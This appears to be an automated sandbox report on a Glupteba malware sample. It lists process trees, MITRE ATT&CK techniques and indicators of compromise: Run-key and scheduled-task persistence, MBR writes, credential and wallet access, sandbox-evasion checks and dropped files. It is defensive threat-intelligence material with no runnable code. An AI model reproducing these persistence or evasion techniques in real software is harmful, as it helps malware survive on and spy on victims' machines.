glupteba | 56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11

System Information Discovery

Processes:

59768322479.exe16825021799.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	59768322479.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	59768322479.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	16825021799.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	16825021799.exe

Loads dropped DLL 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.exeSun1917b8fb5f09db8.execmd.execmd.execmd.execmd.execmd.execmd.exeSun19eb40faaaa9.execmd.execmd.execmd.exeSun195a1614ec24e6a.exeSun1966fb31dd5a07.exeSun19262b9e49ad.exeSun1966fb31dd5a07.tmpLzmwAqmV.exesetup.exeudptest.exesetup_2.exe3002.exe

pid	process
1100	setup_x86_x64_install.exe
1296	setup_installer.exe
1296	setup_installer.exe
1296	setup_installer.exe
1296	setup_installer.exe
1296	setup_installer.exe
1296	setup_installer.exe
1864	setup_install.exe
1864	setup_install.exe
1864	setup_install.exe
1864	setup_install.exe
1864	setup_install.exe
1864	setup_install.exe
1864	setup_install.exe
1864	setup_install.exe
108	cmd.exe
1156	cmd.exe
1828	Sun1917b8fb5f09db8.exe
1828	Sun1917b8fb5f09db8.exe
616	cmd.exe
616	cmd.exe
1472	cmd.exe
1428	cmd.exe
1468	cmd.exe
1376	cmd.exe
2016	cmd.exe
2016	cmd.exe
1652	Sun19eb40faaaa9.exe
1652	Sun19eb40faaaa9.exe
1672	cmd.exe
1540	cmd.exe
1192	cmd.exe
1772	Sun195a1614ec24e6a.exe
1772	Sun195a1614ec24e6a.exe
1724	Sun1966fb31dd5a07.exe
1724	Sun1966fb31dd5a07.exe
1724	Sun1966fb31dd5a07.exe
1832	Sun19262b9e49ad.exe
1832	Sun19262b9e49ad.exe
1264	Sun1966fb31dd5a07.tmp
1264	Sun1966fb31dd5a07.tmp
1264	Sun1966fb31dd5a07.tmp
1968	LzmwAqmV.exe
1968	LzmwAqmV.exe
1968	LzmwAqmV.exe
1968	LzmwAqmV.exe
1968	LzmwAqmV.exe
1968	LzmwAqmV.exe
1264	Sun1966fb31dd5a07.tmp
2336	setup.exe
1968	LzmwAqmV.exe
1968	LzmwAqmV.exe
1968	LzmwAqmV.exe
2508	udptest.exe
2508	udptest.exe
1968	LzmwAqmV.exe
1968	LzmwAqmV.exe
2752	setup_2.exe
2752	setup_2.exe
1968	LzmwAqmV.exe
1968	LzmwAqmV.exe
2800	3002.exe
2800	3002.exe
1968	LzmwAqmV.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

2532 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2532	icacls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

Ze2ro.exeB6B2.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Google\\Dyshokasevy.exe\""	Ze2ro.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\1d6eede1-5293-4349-a43e-2da724a3f71a\\B6B2.exe\" --AutoStart"	B6B2.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

Processes:

16825021799.exe59768322479.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	16825021799.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	59768322479.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

installer.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

14 ip-api.com
311 api.2ip.ua
313 api.2ip.ua
344 api.2ip.ua
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1067

Processes:

ED6C.exe

description ioc process

File opened for modification \??\PHYSICALDRIVE0 ED6C.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

16825021799.exe59768322479.exe

pid process

2280 16825021799.exe
2820 59768322479.exe

flow	ioc
14	ip-api.com
311	api.2ip.ua
313	api.2ip.ua
344	api.2ip.ua

description	ioc	process
File opened for modification	\??\PHYSICALDRIVE0	ED6C.exe

pid	process
2280	16825021799.exe
2820	59768322479.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

services64.exeGarbage Cleaner.exeB6B2.exeB6B2.exebuild2.exe

description	pid	process	target process
PID 1320 set thread context of 3108	1320	services64.exe	explorer.exe
PID 3532 set thread context of 3740	3532	Garbage Cleaner.exe	Garbage Cleaner.exe
PID 3600 set thread context of 2240	3600	B6B2.exe	B6B2.exe
PID 1528 set thread context of 3540	1528	B6B2.exe	B6B2.exe
PID 632 set thread context of 2968	632	build2.exe	build2.exe

Drops file in Program Files directory 64 IoCs

Processes:

autosubplayer.exemsiexec.exeultramediaburner.tmp

description	ioc	process
File created	C:\Program Files (x86)\lighteningplayer\lua\http\index.html	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\browse_window.html	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm_cmd.xml	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\modules\host.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_imem_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\keystore\libfile_keystore_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libdirectsound_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwasapi_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\http.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libdvdnav_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libhttps_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libclone_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_wasapi_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png	autosubplayer.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk	msiexec.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\reader\filename.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm.xml	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_streams.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libaiff_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libsmf_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\custom.lua	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\favicon.ico	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\js\controllers.js	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libnetsync_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdirectory_demux_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe	msiexec.exe
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\extensions\VLSub.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\newgrounds.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_cdg_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libgme_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-AEVA3.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\youtube.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\view.html	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_config_window.html	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Other-48.png	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\mosaic_window.html	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\modules\sandbox.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libasf_plugin.dll	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url	msiexec.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\rockbox_fm_presets.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\twitch.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_hevc_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.json	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp

Drops file in Windows directory 30 IoCs

Processes:

msiexec.exe

description	ioc	process
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\a26e1.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBB0A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC651.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3B26.tmp	msiexec.exe
File created	C:\Windows\Installer\a26e3.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3DAB.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5AFD.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File created	C:\Windows\Installer\a26e1.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1C84.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI71E8.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIAE4D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF19C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4DE2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9E15.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA47C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID3F9.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI772E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4A24.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI853A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\a26e3.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4903.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2E88.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9551.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\a26e5.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDCAF.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

1848 2536 WerFault.exe 5.exe
968 1652 WerFault.exe Sun19eb40faaaa9.exe
3564 2968 WerFault.exe build2.exe

pid	pid_target	process	target process
1848	2536	WerFault.exe	5.exe
968	1652	WerFault.exe	Sun19eb40faaaa9.exe
3564	2968	WerFault.exe	build2.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

Sun1908b94df837b3158.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun1908b94df837b3158.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun1908b94df837b3158.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun1908b94df837b3158.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

90465974774.exeB4B2.exe35378882040.exe20868724921.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	90465974774.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	90465974774.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	B4B2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	B4B2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	35378882040.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	35378882040.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	20868724921.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	20868724921.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2364 schtasks.exe
1472 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

3592 timeout.exe
864 timeout.exe
Kills process with taskkill 7 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

2324 taskkill.exe
2476 taskkill.exe
3552 taskkill.exe
3244 taskkill.exe
1644 taskkill.exe
3600 taskkill.exe
3552 taskkill.exe

pid	process
2364	schtasks.exe
1472	schtasks.exe

pid	process
3592	timeout.exe
864	timeout.exe

pid	process
2324	taskkill.exe
2476	taskkill.exe
3552	taskkill.exe
3244	taskkill.exe
1644	taskkill.exe
3600	taskkill.exe
3552	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

Processes:

iexplore.exeiexplore.exeIEXPLORE.EXEiexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "339079834"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\ = "1404"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\ = "90"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\Total = "90"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\ = "28"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\ = "75"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\Total = "28"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\Total = "75"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "1310"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\ = "1310"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\Total = "47"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\Total = "1310"	IEXPLORE.EXE
